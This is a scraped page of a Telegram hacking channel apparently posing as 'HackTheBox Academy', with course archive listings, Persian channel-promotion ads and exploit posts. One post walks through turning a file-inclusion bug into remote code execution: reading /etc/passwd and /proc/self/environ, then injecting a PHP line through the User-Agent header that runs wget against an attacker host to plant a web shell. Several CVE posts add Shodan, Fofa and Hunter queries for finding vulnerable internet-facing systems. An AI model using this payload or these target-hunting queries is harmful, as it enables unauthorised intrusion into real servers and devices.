en
Feedback
HackTheBox Academy

HackTheBox Academy

Closed channel

🔴Learn About #Linux 🔴Learn About #Windows 🔴Learn About #CVE 🔴Learn About #EXPLOIT 🔴Learn About #Vulnerability ✅ADMIN : @NullByte0x1

Show more
3 327
Subscribers
No data24 hours
-207 days
-9330 days
Posts Archive
↔️ Due to the banning of hacking and security channels by the Telegram team, we decided to make the backup channel available for friends. 🌟 Please Join. 👉 @HackTheBox_Academy

Repost from GitHub BOX
New #HACKING repository: Title: AllAboutBugBounty Link: https://github.com/daffainfo/AllAboutBugBounty

@HackTheBox-Academy - Web App Pentesting Part 27-33.7z1473.41 MB

@HackTheBox-Academy - Web App Pentesting Part 18-26.7z1931.04 MB

@HackTheBox-Academy - Web App Pentesting Part 10-17.7z1900.49 MB

@HackTheBox-Academy - Web App Pentesting Part 1-9.7z1922.93 MB

🩸🩸🫵🩸🩸🩸 💥 🕷 Hands-On Web App Pentesting. #Course #Pentest #Owasp #Hacking #Ethical_Hacker #Security ➖➖➖➖➖➖➖➖➖ 🌐 @Hack
🩸🩸🫵🩸🩸🩸 💥 🕷 Hands-On Web App Pentesting. #Course #Pentest #Owasp #Hacking #Ethical_Hacker #Security ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

#LFI To #RCE. 1. Find A Target That Vulnerable To LFI 2. Test For Reading File (/etc/passwd) 3. If The 2nd Item Was Succes, Test for Another File Named environ
/proc/self/environ
4. In Some Case Its Available, In Some Cases is NOT. 5. If The File Was Available you should See The File Like This That Contain User-Agent.
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE= Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80
6. Now let's inject our malicious code in proc/self/environ With User-Agent HTTP Header. 7. Start BurpSuite And Capture The Request. 8. Modify User-Agent With PHP Shell Code. or You Can Use This
<?system('wget http://Attacker/Shells/gny.txt -O shell.php');?>
9. Access Your Shell. 10. www.Target.com/shell.php. #Ethical_Hacker #LFI #RCE #Pentest #Vulnerability #Web ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

🔶️ دوستان هرکس کانال 700 + داره میتواند در تبادل لیستی ما شرکت کند حتما با ما در ارتباط باشد : @Unique_exploitbot

⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️ 💠 تست نفوذ را رایگان یاد بگیر . ⭕️ @TryHackBox 📖 کتاب ها و منابع Cyber Security 📚 @LibrarySecOfficial 💠 رودمپ های مختلف از جمله ردتیم بلوتیم تست نفوذ و ... ⭕️ @TryHackBoxOfficial 💠 منابع BlueTeam : ⭕️ @BlueTeamKit 💠 ابزارها و دوره های OSINT ⭕️ @OsintGit 💠 برگزاری دوره های امنیت سایبری ⭕️ @kasraone_com 💠 تمامی منابع Red Team اینجاست! 💠 آموزش توسعه بدافزار (رایگان) ⭕️ @RedTeamVillageRTV 💠 منابع CTF و رایت آپ ها و دوره های HackTheBox  : ⭕️ @PfkCTF 💠پنتست وب رو یاد بگیر ⭕️ @GitBook_s 💠 دوره های آموزشی - CVE-Exploit ⭕️ @HackTheBox_Academy 💠 برای اضافه شدن در لیست تبادلات پیام دهید : 🤖 @Unique_exploitbot ⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️

sticker.webp0.24 KB

↔️ CVE-2024-9047 ❗️ The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and
↔️ CVE-2024-9047 ❗️ The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.11 via wfu_file_downloader.php. 🖥 Exploit - POC 🔎 Fofa:
body="wp-content/plugins/wp-file-upload" && body="wordpress-file-upload-style-css"
#Ethical_Hacker #Exploit #WordPress #CVE #Pentest #Vulnerability #Web ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

↔️ CVE-2024-50603 ❗️ Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacke
↔️ CVE-2024-50603 ❗️ Due to the improper neutralization of special elements used in an OS command, an unauthenticated attacker is able to execute arbitrary code. Shell metacharacters can be sent to /v1/api in cloud. 🖥 NucleiTemplate - POC 🔎 SHODAN:
title="Aviatrix Controller"
🔎 Fofa:
product="aVIaTrIX-Controller"
🔎 Hunter:
product.name="Aviatrix Controller"
#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

↔️ CVE-2024-6782 ❗️ Improper access control in Calibre 6.9.0 ~ 7.14.0 allow unauthenticated attackers to achieve remote code
↔️ CVE-2024-6782 ❗️ Improper access control in Calibre 6.9.0 ~ 7.14.0 allow unauthenticated attackers to achieve remote code execution. 🖥 Exploit - POC ⚔️ Nuclei-Template 🔎 SHODAN:
html:"Calibre"
🔎Fofa:
server="Calibre"
#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️ 💠 تست نفوذ را رایگان یاد بگیر . ⭕️ @TryHackBox 📖 کتاب ها و منابع Cyber Security 📚 @LibrarySecOfficial 💠 رودمپ های مختلف از جمله ردتیم بلوتیم تست نفوذ و ... ⭕️ @TryHackBoxOfficial 💠 منابع BlueTeam : ⭕️ @BlueTeamKit 💠 ابزارها و دوره های OSINT ⭕️ @OsintGit 💠 برگزاری دوره های امنیت سایبری ⭕ @kasraone_com 💠 تمامی منابع Red Team اینجاست! 💠 آموزش توسعه بدافزار (رایگان) ⭕ @RedTeamVillageRTV 💠 منابع CTF و رایت آپ ها و دوره های HackTheBox  : ⭕ @PfkCTF 💠 آموزش وب‌هکینگ و باگ بانتی ⭕ @EroHack0 💠پنتست وب رو یاد بگیر ⭕️ @GitBook_s 💠 دوره های آموزشی - CVE-Exploit ⭕ @HackTheBox_Academy 💠 برای اضافه شدن در لیست پیام دهید : 🤖 @Unique_exploitbot ⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️⚜️

sticker.webp0.24 KB

↔️ CVE-2024-49112 ❗️ Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability. 🖥 Exploit - POC 🔎 HUNTER:
protocol=="ldaps" or protocol=="ldap"
#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

↔️ CVE-2024-1212 ❗️ Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabl
↔️ CVE-2024-1212 ❗️ Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution. 🖥 Exploit - POC ⚔️ Nuclei-Template 🔎 SHODAN:
html:"LoadMaster"
🔎Fofa:
"LoadMaster" || app="KEMP-Login-Screen"
#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security

↔️ CVE-2024-12987 ❗️ The manipulation of the argument session leads to os command injection. It is possible to launch the att
↔️ CVE-2024-12987 ❗️ The manipulation of the argument session leads to os command injection. It is possible to launch the attack remotely. 👩‍💻 Exploit - POC 🔎Fofa:
app="DrayTek-Vigor300B" || app="DrayTek-Vigor2960"
#Ethical_Hacker #Exploit #RCE #CVE #Pentest #Vulnerability ➖➖➖➖➖➖➖➖➖ 🌐 @HackTheBox_Academy 🌐 @HackTheBox_Security